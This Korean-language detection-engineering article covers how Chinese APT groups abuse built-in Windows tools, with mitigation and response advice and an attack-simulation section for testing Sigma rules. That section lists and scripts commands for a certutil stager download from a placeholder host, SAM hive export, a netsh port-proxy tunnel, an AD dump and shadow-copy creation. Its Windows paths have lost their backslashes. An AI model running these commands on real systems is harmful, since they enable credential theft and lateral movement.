중국 APT가 네이티브 Windows 도구를 악용하는 방법 탐색

요약

이 글은 중국의 고급 지속 가능 위협(APT) 그룹들이 어떻게 Windows 내장 유틸리티(LOLBAS)를 악용하여 정찰을 수행하고, 자격 증명을 탈취하며, 환경 내부에서 횡적으로 이동하면서 일상적인 관리자 활동에 섞이는지를 탐구합니다.

조사

특정 명령줄을 사용한 기본 도구들의 사용을 강조하고 있습니다, 예를 들어 nltest, certutil, netsh, reg.exe, vssadmin등을 포함하며, 이러한 기법을 SIEM 플랫폼에서 탐지할 수 있는 Sigma 규칙을 지적합니다.

완화책

수비수들은 의심스러운 Windows 기본 바이너리 실행을 모니터링하고, 최소 권한 접근 제어를 시행하며, 레지스트리 수정 사항을 감사하고, 참조된 Sigma 패턴 기반 탐지 논리를 배포하는 것을 권장합니다.

대응

의심스러운 LOLBAS 활동이 식별되면, 보안 팀은 경고를 발령하고, 영향을 받은 호스트를 격리하며, 관련 로그를 수집하고, 자격 증명 덤핑 또는 횡적 이동이 발생했는지 확인하고, 발생한 아티팩트에 대한 포렌식 분석을 수행해야 합니다.

시뮬레이션 실행

전제 조건: Telesmetry & Baseline 사전 점검이 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 작동시키기 위해 설계된 적대적 기술(TTP)의 정확한 실행을 세부적으로 설명합니다. 명령과 서사는 반드시 식별된 TTP를 직접 반영해야 하며, 탐지 논리에 의해 예상되는 정확한 원격 계측을 생성하는 것을 목표로 합니다.

• 공격 서사 및 명령어:

  도메인에 접속된 Windows 워크스테이션에서 초기 기반을 잡은 공격자는 전통적인 AV 서명을 트리거하지 않기 위해 기본 바이너리만을 사용하여 도메인을 매핑하고, 특권 그룹을 열거하며 자격 증명 자료를 수집하고자 합니다. 단계는 다음과 같습니다:

  1. 도메인 컨트롤러 열거: nltest /dclist:domain.local – 대상 도메인의 모든 DC를 드러냅니다.
  2. 시스템 정보 수집: systeminfo – OS 버전, 패치, 하드웨어 세부 정보를 수집합니다.
  3. 실행 중인 프로세스 목록: tasklist – 특권 서비스에 대한 통찰을 제공합니다.
  4. 로그온 이벤트를 위한 Windows 이벤트 로그 쿼리: Get-EventLog -LogName Security -InstanceId 4624 (PowerShell) – 성공적인 로그온 이벤트를 추출합니다.
  5. 단계적 페이로드 다운로드: certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe – 웹 필터링을 우회하기 위해 certutil을 사용합니다.
  6. 로컬 관리자 열거: net localgroup administrators – 특권 계정을 식별합니다.
  7. SAM 레지스트리 하이브 내보내기: reg.exe save hklmsam C:sam.save – 암호 해시 덤프를 시도합니다.
  8. 횡적 이동을 위한 포트 프록시 생성: netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 – 터널을 준비합니다.
  9. DNS 레코드 열거: dnscmd . /enumrecords /zone – 내부 DNS 구역을 발견합니다.
  10. LDIFDE를 통해 AD 객체 내보내기: ldifde.exe -f C:WindowsTempad_dump.txt -p subtree – 디렉터리 데이터를 가져옵니다.
  11. 볼륨 섀도 복사본 생성: vssadmin create shadow /for=C: – 잠긴 파일에 대한 파일 수준 접근을 가능하게 합니다.

  각 명령은 Sigma 규칙의 “CommandLine|contains” 문자열 중 하나와 정확히 일치하여, 규칙이 생성 과정 이벤트에서 발동되도록 보장합니다.

• 회귀 시험 스크립트: (PowerShell – 독립 실행형이며, 관리자 권한 필요)

  # TC-20260518-A7B9K – 일반 Windows 유틸리티의 adversary 사용 시뮬레이션
  # 참고: 도메인에 연결된 Windows 호스트에서 관리자 권한으로 실행합니다.
  
  # 1. 도메인 컨트롤러 열거
  nltest /dclist:domain.local
  
  # 2. 시스템 정보
  systeminfo
  
  # 3. 프로세스 목록
  tasklist
  
  # 4. 보안 이벤트 로그 추출 (PowerShell)
  Get-EventLog -LogName security -InstanceId 4624
  
  # 5. certutil을 통한 단계적 페이로드 다운로드
  certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe
  
  # 6. 로컬 관리자 열거
  net localgroup administrators
  
  # 7. SAM 하이브 내보내기
  reg.exe save hklmsam C:sam.save
  
  # 8. 포트 프록시 구성
  netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389
  
  # 9. DNS 구역 열거
  dnscmd . /enumrecords /zone
  
  # 10. AD 데이터를 LDIFDE를 통해 내보내기
  ldifde.exe -f C:WindowsTempad_dump.txt -p subtree
  
  # 11. 볼륨 섀도 복사본 생성
  vssadmin create shadow /for=C:

• 정리 명령:

  # 시뮬레이션 중 생성된 파일 제거
  Remove-Item -Path C:WindowsTempstager.exe -ErrorAction SilentlyContinue
  Remove-Item -Path C:sam.save -ErrorAction SilentlyContinue
  Remove-Item -Path C:WindowsTempad_dump.txt -ErrorAction SilentlyContinue
  
  # 포트프록시 규칙 삭제
  netsh interface portproxy delete v4tov4 listenport=4444
  
  # 그림자 복사본 삭제 (선택 사항 – 그림자 복사본 ID 필요)
  # vssadmin delete shadows /for=C: /all /quiet